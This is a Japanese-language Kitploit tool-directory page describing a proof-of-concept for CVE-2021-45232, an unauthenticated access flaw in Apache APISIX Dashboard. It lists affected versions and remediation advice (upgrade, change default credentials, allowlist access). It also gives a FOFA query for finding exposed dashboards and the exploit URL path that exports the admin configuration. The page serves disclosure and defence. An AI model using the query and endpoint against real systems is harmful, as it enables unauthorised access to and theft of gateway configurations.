Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-45232 — CVE-2021-45232の概念実証エクスプロイト。Apache APISIX Dashboardにおける不正アクセス脆弱性で、APIエンドポイントを介した管理者設定のエクスポート/インポートを可能にします。 | Kitploit
ツール/GitHubGitHub/ltidi2000/cve-2021-45232
脆弱性分析エクスプロイトウェブアプリケーション悪用設定ミスAPIセキュリティ
GitHubltidi2000/cve-2021-45232

CVE-2021-45232

CVE-2021-45232の概念実証エクスプロイト。Apache APISIX Dashboardにおける不正アクセス脆弱性で、APIエンドポイントを介した管理者設定のエクスポート/インポートを可能にします。

リポジトリを見る
14年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Apache APISIX Dashboard 未承認アクセス脆弱性 (CVE-2021-45232)

FOFA クエリ

title="Apache APISIX Dashboard"

影響範囲

Apache APISIX Dashboard < 2.10.1

POC:

root@kitploit:~
IP:PORT/apisix/admin/migrate/export

image

修正提案

  • 最新のセキュリティバージョン Apache APISIX Dashboard 2.10.1 にアップグレードしてください:https://github.com/apache/apisix-dashboard/releases/tag/v2.10.1

  • デフォルトのユーザー名とパスワードを変更し、Apache APISIX Dashboard へのアクセスをホワイトリストで構成してください。

参考リンク

https://apisix.apache.org/zh/blog/2021/12/28/dashboard-cve-2021-45232/

ツールをダウンロード